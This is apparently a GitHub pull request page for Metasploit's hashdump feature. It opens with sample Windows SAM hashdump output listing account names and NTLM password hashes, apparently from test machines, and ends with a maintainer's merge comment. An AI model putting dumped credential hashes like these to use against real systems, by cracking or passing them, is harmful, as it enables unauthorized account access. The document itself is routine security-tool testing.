admin:1005:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1006:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Alan David Foster:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
basic_user:1007:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
foo:1003:aad3b435b51404eeaad3b435b51404ee:ac8e657f83df82beea5d43bdaf7800cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test_user:1002:aad3b435b51404eeaad3b435b51404ee:066ddfd4ef0e9cd7c256fe77191ef43c:::
user:1004:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:19ce80797959fdfb522f09643d79aa26:::

@adfoster-r7
Copy link
Contributor

Tested against a larger DC with 1k+ users; I think that's everything tested now - will land

@adfoster-r7 adfoster-r7 merged commit c7116e2 into rapid7:master Apr 27, 2023
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Apr 27, 2023
@zeroSteiner
Update metasploit-payloads gem to 2.0.130
36f9025 
Includes changes from:
* rapid7/metasploit-payloads#631
* rapid7/metasploit-payloads#639
* rapid7/metasploit-payloads#634
@zeroSteiner zeroSteiner mentioned this pull request Apr 27, 2023
Merged
@smcintyre-r7 smcintyre-r7 mentioned this pull request Jun 21, 2023
Merged
9 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@adfoster-r7 adfoster-r7

Labels
None yet
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Fix or improve UX of hashdump on 32 bit meterpreter on 64 bit host
4 participants
@zeroSteiner @jmartin-tech @adfoster-r7 @smcintyre-r7